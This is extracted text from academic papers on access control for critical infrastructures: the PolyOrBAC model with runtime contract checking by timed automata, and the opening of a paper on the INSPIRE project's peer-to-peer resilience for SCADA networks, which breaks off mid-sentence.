The main contributions of this paper are (1) : 1. a clear identification of CIs security requirements; 2. a framework to express a global security policy for a set of connected CIs, which will enable specifying their security policy and deriving concrete access control decisions as well as suitable security enforcement mechanisms; 3. a template to specify the requirements of the contracts that can be signed between the CI partners, and a framework to securely check the well-execution of the contract clauses by verifying certain security porperties, and to audit the interactions between partners. In this way, not only we do enforce an intra-organizational access control, but also we check (at runtime) and audit the extra-organizational interactions as well as remote accesses, with the possibility to prove infractions and to clearly identify the responsibilities in case of dispute.
2 Security Requirements of CI In order to progressively derive an access control model and a secure architecture adapted to CIs, we first identify the security requirements of a CI and we confront them to existing access control models. Note that even if we take our examples from the electric power grid, the same approach and results apply to any kind of CI. Globally, a CI can be seen as a WAN connecting several organizations involving different actors and stakeholders (e.g., power generation companies, energy authorities, transmission and distribution system operators). Each of these organizations is operated as a LAN, composed of one or more logical and physical systems, and the LANs are interconnected through specific switches to form the WAN. In the context of the CRUTIAL (CRitical
Critical Infrastructures Security Modeling, Enforcement and Runtime Checking
97
UTility InfrastructurAL Resilience) European FP6-IST research project, the switches are called CIS (CRUTIAL Information Switches) [5]. In this respect, we can identify the following security-related requirements: 1. Secure cooperation between different organizations, possibly mutually suspicious, with different features, operation rules and security policies. 2. autonomous organizations: each organization controls its own security policy, applications, etc., while cooperating for the global operation of the whole system. We thus need a global security policy that manages the communication between partners while keeping each CI responsible for its own assets and users. 3. Consistency: as no SCADA system operates in isolation, the global as well as local security policies should be compatible. 4. Distributed security: the enforcement and administration of the security policies should be decentralized. A centralized approach is not appropriate since a CI involves the cooperation between independent organizations, with different interests, sometimes conflicting, with no agreed global authority. Inversely, handling the collaboration between the subsystems while keeping some local self-determination seems more appropriate. 5. Heterogeneity: as each organization is free to have its own structure, services, and IS, a CI is heterogeneous. Moreover, the security policy must be vendor- and manufacturer-independent: when technology changes or when new components or systems are implemented in a CI, the policy must remain effective. 6. Granularity vs. scalability: on the one hand, security rules must be extensible in size and structure; on the other hand, internal authentication as well as local access controls should be managed by each organization separately. 7. Fine-grained, dynamic access control: access control enforcement must be at a low granularity level to be efficient, while access decisions should take the context (e.g., specific situations, with time and location constraints) into account. Moreover, as the context may change often and as a certain reactivity is required in such systems, organizations should support dynamic access rights. 8. User-friendliness and easiness of rule administration: as the system links several organizations geographically distributed and as it handles a large amount of information and several users, access right management should be sufficiently userfriendly to manage such a complexity without introducing human errors. 9. External accesses: each organization’s security policy should define if and how outsiders can access the automation system belonging to the organization. E.g., it is important to define how equipment vendors can access the system remotely for off-site maintenance and product upgrades, but also how other organizations participating in the CI can access local resources. 10. Compliance with specific regulations: e.g., in United-States, NERC 1200 [3] specifies requirements for cyber-security related to electric utilities. 11. Confidentiality, integrity and availability: contrarily to other systems where mostly confidentiality (military systems), or integrity (financial systems) or availability is needed, in CIs we often need all three properties: confidentiality of each CI’s data, e.g., invitation to tenders, but also integrity and availability of data such as the voltage/frequency measurements.
98
A.A. El Kalam and Y. Deswarte
12. Enforcement of permission, explicit prohibition as well as obligation rules: explicit prohibitions can be particularly useful, as we have decentralized policies where each administrator does not know details about the other parts of the infrastructure. Moreover, explicit prohibitions can also specify exceptions, or limit the propagation of permissions in case of role hierarchies. Similarly, obligations can be useful to impose some actions that should be carried out by users or that should be automatically performed by the system itself. 13. Audit and assessment: the security policy should define audit requirements such as what data must be logged, when, where, etc. In particular, an audit should determine if the protections which are detailed in the policy are being correctly used in practice; it also keeps logs on interactions between partners, to verify if they comply with the biparty contracts, and provide evidence in case of dispute. 14. Support, enforcement and real time checking of the contracts that can be established between the different organizations: we should be able to capture and check all the access modalities (permissions, prohibitions and obligations) and temporal modalities, and liabilities concerning the compliance with the contracts. The security requirements cited above should be expressed through a suitable security policy. The security policy is defined by the ITSEC as the set of laws, rules, and practices that regulate how sensitive information and other resources are managed, protected and distributed within a specific system [6]. In this respect, a security policy is specified through security requirements that must be satisfied, and rules expressing how the system may evolve in a secure way. Nevertheless, by itself, the security policy does not guarantee that the system runs correctly and securely: the security policy can indeed be badly designed or violated, intentionally or accidentally. Consequently, it is important to express the policy according to a security model. A model helps to: abstract the policy and handle its complexity; represent the secure states of a system (i.e., states that satisfies the security requirements) as well as the way in which the system may evolve; verify the consistency of the security policy and detect the possible conflicting situations. In the next section we present three different categories of access control models and policies and we confront them to the CI requirements cited above.
3 An Access Control Model for CIs 3.1 OrBAC In [7], we have defined the OrBAC (Organization-based Access Control) model as an extension of the traditional RBAC (Role-Based Access Control) model [8]. For managing the security policy complexity, our first goal was to express it with abstract entities only, and thus to separate the representation of the security policy from its implementation. Indeed, OrBAC is based on roles to abstract users, views as the abstraction of objects, and activities as the abstraction of actions. In OrBAC, an activity is a group of one or more actions; a view is a group of one or more objects; and a context is a specific situation that conditions the validity of a rule. Actually, two security levels can be distinguished in OrBAC:
Critical Infrastructures Security Modeling, Enforcement and Runtime Checking
99
– Abstract level: the security administrator defines security rules through abstract entities (roles, activities, views) without worrying about how each organization implements these entities. – Concrete level: when a user requests an access, authorizations are granted to him according to the concerned rules, the organization, the role currently played by the user, the requested action (instanting an activity defined in the rule) on the object (instanting a view defined in the rule), and the current context. The derivation of permissions (i.e., runtime instantiation of security rules) can be formally expressed as follows: ∀ org ∈ Organization, ∀s ∈ Subject, ∀ α ∈ Action, ∀ o ∈ Object, ∀ r ∈ Role, ∀a ∈ Activity, ∀ v ∈ View, ∀ c ∈ Context Permission (org, r, v, a, c) ∧ Empower (org, s, r) ∧ Consider (org, a, a) ∧ Use (org, o, v) ∧ Hold (org, s, a, o, c) → Is permitted(s, α , o) This rule means: if in a certain organization, a security rule specifies that role r can carry out the activity a on the view v when the context c is true; if r is assigned to subject s; if action α is a part of a; if object o is part of v; and if the context c is true; then s is allowed to perform α (e.g., SELECT) on o (e.g., F 1. TXT). Prohibitions, and obligations can be defined in the same way. As rules are expressed only through abstract entities, OrBAC is able to specify the security policies of several collaborating and heterogeneous sub-organizations (e.g., in a CI) of a global organization. In fact, the same role, e.g., OPERATOR can be played by several users belonging to different sub-organizations; the same view e.g., T ECH NICAL F ILE can designate a table TF-TABLE in one sub-organization or a XML object TF1. XML in another one; and the same activity READ can correspond in a particular sub-organization to a SELECT action while in another sub-organization it may specify an O PEN XML FILE () action. In our context, OrBAC presents several benefits and satisfies several security requirements of CIs: rules expressiveness, abstraction of the security policy, scalability, heterogeneity, evolvability, and user-frienliness. However, OrBAC is centralized and does not handle collaborations between non-hierarchical CIs. In fact, as OrBAC security rules have the Permission(org, r, v, a, c) form, it is not possible to represent rules that involve several autonomous organizations. Moreover, it is impossible to associate permissions to users belonging to other partner-organizations. As a result, OrBAC is unfortunately only adapted to centralized infrastructures and does not cover the distribution, collaboration and interoperability needs of current CIs. 3.2 Multi-OrBAC To overcome these limitations, we proposed the MultiOrBAC model in [9]. The main question addressed by MultiOrBAC: in a distributed system, how to securely manage remote accesses? To answer this question we first introduced the Role-in-Organization (RiO), View-in-Organization (ViO), Activity-in-Organization (AiO), and Context-inOrganization (CiO) concepts. Then, we simply transform the OrBAC rules by replacing r by RiO, v by ViO, a by AiO and c by CiO. In this respect, the security rule have the Permission(RiO, ViO, AiO, CiO) form.
100
A.A. El Kalam and Y. Deswarte
Therefore, contrarily to OrBAC, a MultiOrBAC rule may involve two different organizations (that do not necessarily belong to the same hierarchy): the organization where the role is played, and the organization to which belong the view and the activity. However, in the context of CIs, Multi-OrBAC presents several weaknesses. In fact, MultiOrBAC offers the possibility to define local rules / accesses for external roles, without having any information about who plays these roles and how the (user, role) association is managed in the remote organization. This causes a serious problem of responsibility and liability: who is responsible in case of remote abuses of privileges? How can the organization to which belongs the object have total confidence in the organization to which belongs the user? The MultiOrBAC logic is thus not adapted to CIs where in-competition organizations can have mutual suspicions. Moreover, in MultiOrBAC the access control decision and enforcement are done by each organization, which means that the global security policy is in fact defined by the set of the organizations’ security policies. It is thus difficult to enforce and maintain the consistency of the global security policy, in particular if each organization’s security policy evolves independently. Finally, the enforcement of the policy by access control mechanisms is not treated neither in OrBAC nor in MultiOrBAC. It is thus necessary to describe a secure architecture and a suitable implementation of the security of the studied CI. To summarize, we can say that even if OrBAC and MuiltiOrBAC present some benefits over traditional security models, they are not really adapted to CIs. To cover the limitations cited above, we suggest enhancing OrBAC with new collaboration-related concepts and calling on some mechanisms of the Web Services (WS) technology [10] [11]. The global framework is called PolyOrBAC. 3.3 PolyOrBAC Let us recall that the WS technology provides platform-independent protocols and standards used for exchanging heterogeneous interoperable data services. Software applications written in various languages and running on various platforms can use WS to exchange data over networks in a manner similar to inter-process communication on a single computer. WS also provide common infrastructure and services (e.g., middleware) for data access, integration, provisioning, cataloging and security. These functionalities are made possible through the use of open standards, such as: XML for exchanging heterogeneous data in a common information format [12]; SOAP, acts as a data transport mechanism to send data between applications in one or several operating systems [13]; WSDL, used to describe the services that a business (e.g., an organization within a CI) offers and to provide a way for individuals and other businesses to access those services [14]; UDDI, is an XML-based registry/directory for businesses worldwide, which enables businesses to list themselves and their services on the Internet and discover each other [15]. Basically, PolyOrBAC operated in two phases: First phase: publication and negotiation of collaboration rules as well as the corresponding access control rules. First, each organization determines which resources it will offer to external partners.
Critical Infrastructures Security Modeling, Enforcement and Runtime Checking
101
Web services are then developed on application servers, and referenced on the Web Interface to be accessible to external users. Second, when a CI publishes its WS at the UDDI registry, the other organizations can contact it to express their wish to use the WS. To highlight the PolyOrBAC concepts, let us take a simple example where organization B offers WS1, and organization A is interested in using WS1. Third, A and B come to an agreement concerning the use of WS1. Then, A and B establish a contract and jointly define security rules concerning the access to WS1. The contract aspects will be discussed in the next section. In the rest of this section, let us focus on access control rules. These rules are registered according to an OrBAC format in databases located on both A and B’s CIS switches. For instance, if the agreement between A and B is “users from A have the permission to consult B’s measurements in the emergency context”, B should, in its OrBAC policy: – have (or create) a rule that grants the permission to a certain role (e.g., O PERATOR) to consult its measurements: Permission(B, Operator, Measurements, Consulting, Emergency); – create a VIRTUAL USER noted PartnerA that represents A for its use of WS1; – add the Empower(B, PartnerA, Operator) association to its rule base. This rule grants the user PartnerA the right to play the O PERATOR role. In parallel, A creates locally a VIRTUAL OBJECT WS1 image which (locally “inA”) represents (the remote) WS1 (i.e., the WS proposed by B), and adds a rule in its OrBAC base to define which of A’s roles can invoke WS1 image to use WS1. Second phase: runtime access to remote services. Let us first precise that we use an AAA (Authentication, Authorization and Accounting) architecture: we separate authentication from authorization; we distinguish access control decision from permissions enforcement; and we keep access logs in the CIS switches (this point will be discussed in the next section). Basically, if a user from A (let us note it Alice) wants to carry out an activity, she is first authenticated by A. Then, protection mechanisms of A check if the OrBAC security policy (of A) allows this activity. We suppose that this activity contains local as well as external accesses (e.g., invocation of B’s WS1). Local accesses should be controlled according to A’s policy, while the WS1 invocation is both controlled by A’s policy (Alice must play a role that is permitted to invoke WS1 image), and by B’s CIS, according to the contract established between A and B. If both access control mechanisms grant the invocation, WS1 is executed under the control of B’s OrBAC policy (in B, PartnerA plays role Operator that is permitted to consult measurements). More precisely, in our implementation, when Alice is authenticated and authorized (by A’s policy) to invoke WS1, an XML-based authorization ticket T1 is generated and granted to Alice. T1 contains the access-related information such as: the VIRTUAL USER played by Alice: PartnerA; Alice’s organization: A; the contract ID; the requested service: WS1; the invocated method, e.g., Select; and a timestamp to prevent replay attacks. Note that T1 is delivered to any user (from A) allowed to access to WS1 (e.g., Jean, Alice). When Alice presents its request as well as T1 (as a proof) to B, B’s CIS
102
A.A. El Kalam and Y. Deswarte
extracts the T1’s parameters, and processes the request. By consulting its security rules, B associates the Operator role to the VIRTUAL USER PartnerA according to Empower(B, PartnerA, Operator). Finally, the access decision is done according to Permission(B, Operator, Measurements, Consulting, Emergency) ∧ Empower(B, PartnerA, Operator). Let us now apply PolyOrBAC to a real electric power grid scenario: in emergency conditions, the TS CC (Transmission System Control Center) can trigger load shedding on the DS (Distribution System) to activate defense plan actions (e.g., to prevent an escalading black-out) on the Distribution Grid. More precisely, the TS CC (Transmission System Control Center) monitors the Electric Power System and elaborates some potentially emergency conditions that could be remedied with opportune load shedding commands applied to particular areas of the Grid. As indicated in Fig. 1 and Fig. 2, during normal operation, the Distribution Substations (DSS) send signals and measurements (voltage, Frequency, etc.) to the Transmission System Control Center TS CC (via the Distribution System Control Center DS CC); in the same way, the Transmission Substations (TSS) send signals and measurements to the TS CC (steps 1, 2 and 3 in Fig. 1). At the TS CC level, when the TSO (Transmission System Operator) detects that a load shedding may be needed in the near future, it sends an arming request to the DS CC (step 4 in Fig. 1). Consequently, the DSO (Distribution System Operator) selects which distribution substations (DSS) must be armed (these substations are those on which the load shedding will apply if a load shedding is necessary), and then sends arming commands to those DSS. The DSO has naturally the permission to arm or disarm any DSS in the area depending of the DS CC. If a Transmission SS (TSS) detects an emergency, it automatically triggers (sends) a load shedding command to all the DSS of its area. Of course, only the DSS already armed will execute the load shedding command. In this scenario, we distinguish four organizations (TS CC, a TSS, DS CC and a DSS), two roles (TSO and DSO) and four web services (Fig. 2): Arming Request, Arming Activation, Confirmed Arming and Load Shedding Activation. Basically, when negotiating the provision/use of WS1 between TS CC and DS CC, on the one hand, TS CC locally stores the WSDL description file and creates a new object as a local image of WS1 (whose actions correspond to WS1 invocations), and on the other hand, DS CC creates a virtual user (playing a role authorized to invoke WS1) to represent TS CC. Moreover, TS CC adds local rules allowing Alice, a user playing the role TSO, to invoke WS1 image: Empower(TS CC, Alice, TSO), and Permission(TS CC, TSO, Arm, TSO Distribution Circuits, Emergency). In this respect, when Alice requests the access to WS1, the access decision is done according to the following rule: Permission(TS CC, TSO, Arm, TSO Distribution Circuits, Emergency) ∧ Empower(TS CC, Alice, TSO) ∧ Consider(TSO NCC, rwx, Arm) ∧ Use (TS CC, WS1 Image, TSO Distribution Circuits) ∧ Hold(TS CC, Alice, rwx, WS1 Image, emergency) → is-permitted(Alice, rwx, WS1 Image) Besides, at the DS CC site, two rules are added: Empower(DS CC, Virtual User1, Operator) and Permission(DS CC, Operator, Access, DSO Distribution Circuits, emergency). Consequently, when Alice invokes WS1 Image, this invocation is transmitted to the DS CC by activating a process (running for Virtual User1) which invokes WS1.
Critical Infrastructures Security Modeling, Enforcement and Runtime Checking
Fig. 1. The exchanged commands
103
Fig. 2. The different WS invocations
This access is checked according to DS CC’s policy and is granted according to the rule: Permission(DS CC, Operator, Arm, DSO Distribution Circuits, Emergency) ∧ Empower(DS CC, Virtual User1, Operator) ∧ Consider(DSO ACC, execute, Arm) ∧ Use(DSO ACC, WS1, TSO Distribution Circuits) ∧ Hold(DSO ACC, Virtual User1, execute, WS1, emergency) → is-permitted(Virtual User1, execute, WS1) This example shows that PolyOrBAC is a convenient framework for expressing CI security piolicies. The following table compares the three models (presented above) by confronting them to the CI security requirements (identified in Section 2). In this table we used the “0, 1, 2” scale to distinguish the levels of respect of the requirements (by the security model): 0= none; 1: a little; 2: good. As indicated in the Table 1, PolyOrBAC is more suitable than the other two models. However, it has some limitations, essentially related to: – The handling of competition / mutual suspicion between CIs; in fact, PolyOrBAC (as MultiOrBAC) offers the possibility to grant local accesses to external users, without having any information about how the (user, role) association is managed in the remote organization. – Support, enforcement and real time checking of contracts established between different CIs; in fact, the system must be able to check the well-respect of the signed contracts. A contract generally contains clauses with temporal constraints, actions / workflows, deontic modalities (e.g., obligations) and sanctions. All this is out of the scope of PolyOrBAC model, but is addressed in the next section. – Audit logging and assessment of the different actions: every deviation from the signed contracts should trigger an alarm and notify the concerned parties. This is also addressed in the next session. The challenge now is to find a convenient framework that captures all these aspects. Actually, we believe that most of these requirements (except deontic modalities) can be
104
A.A. El Kalam and Y. Deswarte Table 1. Comparing PolyOrBAC with traditional access control models
Organizations in competition /mutual suspicion Autonomous organizations Coherence and consistency Decentralization Heterogeneity Granularity vs. scalability Fine-grained access control Easiness of rules administration Handling external accesses Confidentiality, integrity and availability Permissions, prohibitions and obligations Audit logging and assessment Using standards to enforce the policy
OrBAC MultiOrBAC PolyOrBAC 0 0 2 1 1 2 2 1 2 0 1 2 2 2 2 2 2 2 2 2 2 2 0 2 2 2 2 2 2 2 2 2 2 0 0 0 0 0 2
specified by timed automata. Our choice is also motivated by the possibility of checking the correctness of the automata behavior and by the availability of several tools dedicated to this issue. The next section extends timed automata [16] to capture the e-contract security requirements and show how we can verify some security properties and enforce them at run-time by model checking.
4 Runtime Model Checking of the Exchanged Messages Permissions correspond to actions that are authorized by the contract clauses. In our timed automata model, permitted actions are actually specified by transitions. For instance, in Fig. 3, the system can (i.e., has the permission to) execute the action a at any time and then, behaves like the automaton A.
Fig. 3. Modeling Permissions
Fig. 4. Modeling prohibitions
Second, we distinguish two kinds of prohibitions in e-contracts: – Implicit prohibitions: the idea is to only specify permissions in the automata. The states, actions and transitions not represented in the automata are by essence prohibited because the runtime model checker will not recognize them.
Critical Infrastructures Security Modeling, Enforcement and Runtime Checking
105
– Explicit prohibitions: explicit prohibitions can be particularily useful in the management of decentralized policies / contracts where each administrator does not have details about the other organizations participating in the CII. Moreover, explicit prohibitions can also specify exceptions or limit the propagation of permissions in case of hierarchies. In our model, we specify explicit prohibitions by adding a “failure state” where the system will be automatically led if a malicious action is detected. In Fig. 2, as the a action is forbidden, its execution automatically leads to the failure state described by an “unhappy face”. Let us now deal with obligations. Actually, obligations are actions that must be carried out; otherwise the concerned entity will be subject to sanctions. Besides that, as every obligation is also a permission, obligations will be specified by particular transitions (in the same way as permissions). However, as obligations are stronger than permissions, we should add another symbols to capture this semantics and to distinguish between what is mandatory and what is permitted but not mandatory. Actually, to model obligations, we use transition time-outs and invariants. Obligations are very important in the context of CIs where we can find examples (rules) such as: a power generation station has an obligation to supply data from its plant to the Independent System Operator (ISO) and the Transmission Company (TRANSCO); the system has the obligation to report alarms, notify the administrator and keep an audit trail; the ECI D IRECTIVE imposes (on the owners of a CI) the establishment of an Operator Security Plan, which would identify the ECI owners’ and operators’ assets and establish relevant security solutions for their protection. We distinguish two kinds of obligations: internal and external obligations. – An internal obligation is a set of mandatory actions that must be performed by local entities (possibly constrained by a maximum delay). An obligation is automatically triggered by an event such as a change in the context or a particular message exchanged between the contracting entities. – An external obligation is a set of mandatory actions that must be performed by remote entities, but checked by local entities. In this respect, an obligation is considered as a simple transition, and if a maximum delay is assigned to the obligation, a time-out (noted by d in Fig. 5) is set for the delay. When the obligation is fulfilled, this event resets the time-out and the system behaves like A1. On the contrary, if the time-out expires, an exception is raised and the system behaves like A2 (which can be considered as an exception ). When an explicit prohibition is carried out or when an obligation is not fulfilled, a conflicting situation (e.g., one of the parties does not comply with the contract clauses) arises, and the automaton automatically makes a transition to a dispute situation (i.e., to the unhappy state) or trigers an exception processing (A2 in Fig. 4). Actually, modeling disputes will allow to not only identify anomalies and violations, but go further by identifying activities (succession of actions, interactions) that led to these situations, and finally can automatically lead to the cancelation of the contract. Moreover, as disputes have different severities and as they are not all subject to the same sanctions, we use variables (i.e., labels on the unhappy state) to distinguish the different kinds of disputes as well as the corresponding sanctions (Fig. 6).
106
A.A. El Kalam and Y. Deswarte
Fig. 5. Modeling obligations
Fig. 6. Modeling dispute situations
In this section, we presented an homogeneous model to specify the most relevant security requirements for contracts (workflows, actions, permissions, prohibitions, obligations, time constraints, disputes). Of course, this model should be instantiated according to the contracts in use. Due to space limitation it is not possible to present our whole scenario in this paper. Once the expected behaviors of the contracting parties are modeled by timed automatan, we can (1) verify if the system can reach a dispute state, (2) maint an audit log and perform model-checking during runtime, and (3) notify the concerned parties in case of contract violation. Actually, proving that all the possible executions of the system will never lead to a conflicting situation is equivalent to prove that the exchange protocol can be run according to the contract clauses. In our implementation, the automata are modeled by the UPPAAL model checker [17] [18]. The reachability properties are modeled by the Computational Tree Logic (CTL) [19]. For example, the following property E organization.Dispute stands for: “it exists at least one execution where the organization reaches the dispute state”. Inversely, the A[] not organization.Dispute property means that none of the possible executions will lead the organization to a dispute state.
5 Conclusions This paper presented an access control framework for CIs. We first identified the most relevant security-related requirements of CIs. Then, according to these requirements, we proposed the PolyOrBAC security model and we compared it with two other models. Through the use of web services technology, PolyOrBAC offers a decentralized management of the access control policies and an architecture where organizations mutually negotiate contracts for collaboration. We concluded that PolyOrBAC is well adapted to CI organizations, but we also emphasize its limits and weaknesses. In particular, PolyOrBAC, by itself, supports neither the enforcement nor the real-time checking of the exchanges that are established between the different organizations participating in a CI. Moreover, PolyOrBAC does not provide auditing for the different actions. We thus enhanced PolyOrBAC with a runtime model checking framework that captures the security requirements of CI contracts and that can be instantiated according
Critical Infrastructures Security Modeling, Enforcement and Runtime Checking
107
to the actual context of a given CI. Our model checker is also used to check the well execution of the contracts and to verify some security properties. This approach can be extended by taking into account availability and integrity requirements. Availability can be handled by means of obligation rules, making it mandatory to provide enough resources to achieve the requested activities, even in case of events such as component failures or attacks. For integrity, our approach is based on controlling information flows, and preventing flows from low-criticality tasks to high criticality tasks, except when such flows are validated by means of adequate faulttolerance mechanisms, as expressed in Totel’s model [20].
Acknowledgments This work is partially supported by the CRUTIAL (CRitical UTility InfrastructurAL Resilience) European FP6-IST research project, the European Network of Excellence ReSIST and the Airbus ADCN Security project.
References 1. Massoud, A.: North America’s Electricity Infrastructure: Are We Ready for More Perfect Storms? IEEE Security and Privacy 1(5), 19–25 (2003) 2. NERC, Critical Infrastructure Protection Standards CIP-001-1 to CIP-009-1, http://www.nerc.com/page.php?cid=2|20 3. Sources: Staged cyber attack reveals vulnerability in power grid, http://edition.cnn.com/2007/US/09/26/power.at.risk/index.html 4. Kilman, D., Stamp, J.: Framework for SCADA Security Policy. Sandia Corp., 10 (2005) 5. Abou El Kalam, A., Baina, A., Beitollahi, H., Bessani, A., Bondavalli, A., Correia, M., Daidone, A., Deconinck, G., Deswarte, Y., Grandoni, F., Neves, N., Rigole, T., Sousa, P., Verissimo, P.: CRUTIAL Project: Preliminary Architecture Specification. CRUTIAL project, Deliverable D4 (January 2007), http://crutial.cesiricerca.it/content/files/Documents/ Deliverables%20P1/WP1-D2-final.pdf 6. Information Technology Security Evaluation Criteria (ITSEC): Preliminary Harmonised Criteria. Document COM(90) 314, V 1.2. Commission of the European Communities (June 1991), http://www.ssi.gouv.fr/site_documents/ITSEC/ITSEC-uk.pdf 7. Abou El Kalam, A., Balbiani, P., Benferhat, S., Cuppens, F., Deswarte, Y.: Organization Based Access Control. In: IEEE 4th Int. Workshop on Policies for Distributed Systems, POLICY 2003, June 4-6, pp. 120–131. IEEE Computer Society Press, Como (2003) 8. Sandhu, R., Coyne, E.J., Feinstein, H.L., Youman, C.E.: Role-based access control models. IEEE Computer 29(2), 38–47 (1996) 9. Abou El Kalam, A., Deswarte, Y.: Multi-OrBAC: a New Access Control Model for Distributed, Heterogeneous and Collaborative Systems. In: 8th International Symposium on Systems and Information Security, SSI 2006, Sao Jose Dos Campos, Sao Paulo, Brazil (2006) 10. Abou El Kalam, A., Deswarte, Y., Baina, A., Ka˚aniche, M.: Access Control for Collaborative Systems: A Web Services Based Approach. In: IEEE Int. Conference on Web Services, ICWS 2007, July 9-13, pp. 1064–1071. IEEE Computer Society Press, Salt Lake City (2007) 11. Baina, A., Abou El Kalam, A., Deswarte, Y., Ka˚aniche, M.: A Collaborative Access Control Framework for Critical Infrastructures. In: IFIP 11.10 Conference on Critical Infrastructure Protection, ITCIP 2008, Washington, DC, USA, March 16-19 (2008)
108 12. 13. 14. 15. 16. 17. 18. 19.
20.
A.A. El Kalam and Y. Deswarte W3C, Extensible Markup Language (XML), W3C Recommendation (February 2004) W3C, SOAP, Version 1.2 W3C Recommendation (June 2003) W3C, WSDL, Version 2.0, W3C Candidate Recommendation (March 2006) OASIS, UDDI Specifications TC, Universal Description, v3.0.2 (February 2005) Alur, R., Dill, D.L.: A theory of Timed Automata. Theoritical Computer Science 126(2), 183–235 (1994) UPPAAL, tool, http://www.uppaal.com Larsen, K.G., Pettersson, P., Yi, W.: UPPAAL in a nutshell. Journal of Software Tools for Technology Transfer 1(1-2), 134–152 (1997) B´erard, B., Bidiot, M., Finkel, A., Larousinie, F., Petit, A., Petrucci, L., Schnoebelen, P., McKenzie, P.: Systems and Software Verification, Model Checking Techniques and Tools. Springer, Heidelberg (2001) Totel, E., Blanquart, J.P., Deswarte, Y., Powell, D.: Supporting multiple levels of criticality. In: 28th IEEE Fault Tolerant Computing Symposium, Munich, Germany, June 1998, pp. 70– 79 (1998)
INcreasing Security and Protection through Infrastructure REsilience: The INSPIRE Project Salvatore D’Antonio1, Luigi Romano2, Abdelmajid Khelil3 , and Neeraj Suri3 1
Consorzio Interuniversitario Nazionale per l’Informatica
[email protected] 2 Dipartimento per le Tecnologie - University of Napoli Parthenope
[email protected] 3 Department of Computer Science - TU Darmstadt
[email protected],
[email protected] Abstract. The INSPIRE project aims at enhancing the European potential in the field of security by ensuring the protection of critical information infrastructures through (a) the identification of their vulnerabilities and (b) the development of innovative techniques for securing networked process control systems. To increase the resilience of such systems INSPIRE will develop traffic engineering algorithms, diagnostic processes and self-reconfigurable architectures along with recovery techniques. Hence, the core idea of the INSPIRE project is to protect critical information infrastructures by appropriately configuring, managing, and securing the communication network which interconnects the distributed control systems. A working prototype will be implemented as a final demonstrator of selected scenarios. Controls/Communication Experts will support project partners in the validation and demonstration activities. INSPIRE will also contribute to standardization process in order to foster multi-operator interoperability and coordinated strategies for securing lifeline systems.
1 Introduction Systems that manage and control infrastructures over large geographically distributed areas are typically referred to as Supervisory Control and Data Acquisition (SCADA) systems. A SCADA system is composed of a central core, where system information acquisition and control are concentrated, and a number of RTUs (Remote Terminal Units) equipped with limited computational resources. RTUs communicate with the centre by sending to and receiving from it short real-time control messages. Increasingly, the pressures of modernization, integration, cost, and security have forced SCADA systems to migrate from closed proprietary systems and networks towards Components Off The Shelf (COTS) products and hardware, standard network protocols, and shared communication infrastructure. As a consequence, current SCADA systems are vulnerable to attacks due to the open system concept adopted by vendors. For example an attack could be (a) an exploit against the field network based on wireless technologies, (b) an attack that constricts or prevents the real-time delivery of SCADA messages, resulting in a loss of monitoring information or control of portions of the SCADA system. An attacker may engineer a denial of service (DoS) to inhibit some vital features R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 109–118, 2009. c Springer-Verlag Berlin Heidelberg 2009
110
S. D’Antonio et al.
of a complex SCADA system, such as control data aggregation in a distributed or a layered control system or a lack of real time status and historical data synchronization in a central SCADA back-up system. While physical security of critical infrastructure components (included the control system) is garnering considerable attention, lesser attention has been paid so far to the analysis of vulnerabilities resulting from the use of shared communication networks to transport management information between ICT systems devoted to the control of critical infrastructures. In this paper we present the INSPIRE (INcreasing Security and Protection through Infrastructure REsilience) project, which aims at extending basic SCADA functionality as well as improving the effectiveness of security systems devoted to preventing, detecting, and tolerating intrusions in SCADA networks. Specifically, by taking into account the stringent security related requirements of networked Process Control Systems onto the underlying communication infrastructure, the project aims to design techniques such as peer-to-peer overlay routing mechanisms and to develop diagnosis and recovery techniques for SCADA systems. Overall, the core idea of the INSPIRE project is to protect networked process control systems and, then, critical information infrastructures by appropriately configuring, managing, and securing the underlying communication network. The analysis of the specific properties and security requirements of the Process Control Systems will drive the design and development of techniques capable to make the network more resilient and reliable. The remainder of the paper is structured as follows. In section 2 we present peer-to-peer overlay routing as a promising technique for SCADA resilience. Section 3 illustrates a distributed approach to SCADA systems diagnosis. In section 4 the most relevant research initiatives in the area of Critical Information Infrastructure Protection are presented by emphasizing their potential relationships with the INSPIRE project. Finally, section 5 provides some concluding remarks.
2 Peer-to-Peer Overlay Routing for Resilient SCADA Systems Peer-to-peer (P2P) overlay networks generalize the established centralized ClientServer architecture (as in SCADA systems) and create a decentralized architecture where equal peer nodes simultaneously act as clients and servers. Along with this decentralized architecture P2P overlays provide for self-organization and self-healing properties which emphasizes the potentials that P2P can provide in building resilient SCADA systems. Furthermore, P2P architectures allow for masking strong heterogeneities in both communication nodes and links making them very attractive for the interconnected by-nature-heterogeneous SCADA critical infrastructures. In addition, P2P overlays work well for dynamic topologies that future SCADA systems are tending towards to integrate dynamic ad hoc networks. Consequently, we consider P2P to play a major role in protecting critical infrastructures by enhancing their self-* properties and enabling their controlled evolvability. As the trend towards all-IP devices in modern and future SCADA systems is obvious, the main infrastructural pre-condition for deploying P2P overlays is provided. The INSPIRE project aims at investigating the characteristics of P2P for the purpose of hardening SCADA systems against a cyber-attack. When it appears that real-time message delivery constraints are not being met (for example,
INcreasing Security and Protection through Infrastructure REsilience
111
given a denial of service attack), a P2P overlay network can be used to route message floods in an effort to ensure delivery. In addition, P2P allows for a controlled replication of SCADA-related data which hardens the resilience of the SCADA responsiveness. In particular, in case of failures or attacks, the P2P overlay may act as a back-up service. In INSPIRE we will investigate the benefits of deploying P2P architectures in existing as well as in future SCADA systems. For existing ones we will investigate the cost trade-off for replacing existing P2P-unenabled nodes and keeping the existing ones while adding a few additional P2P-enabled nodes. We are aware that P2P usage consumes bandwidth which the critical SCADA applications rely upon. We will specifically consider this issue in the design of the INSPIRE P2P overlay network through (a) minimizing the P2P related traffic, (b) reserving a bounded bandwidth for P2P, (c) prioritizing the P2P traffic content, and (d) monitoring the P2P traffic for hot spot identification. To provide for these capabilities, we propose an on-demand use of the P2P overlay network, e.g. upon intrusion detection, otherwise the P2P service is passive. In INSPIRE, the existing P2P systems will be investigated according to their suitability to SCADA systems fulfilling their requirements. In particular, we will ensure that the P2P deployment will not introduce new vulnerabilities to the system. This is achievable through selection of closed P2P systems or systems that enable attack detection and recovery. A closed P2P overlay is characterized by the fact that peers are authorized and known a priori, and that only authorized entities can add/remove peers if needed. The SCADA system and P2P nodes utilize strong hardware-based authentication techniques to prevent injection of false data or commands, and to harden the routing overlay. Also threat modelling and vulnerability assessment for P2P-enabled SCADA systems will be performed. Accordingly, we will provide guidelines for augmenting SCADA systems with P2P networks for the purpose of protection, while addressing the tradeoffs across benefits and risks. In 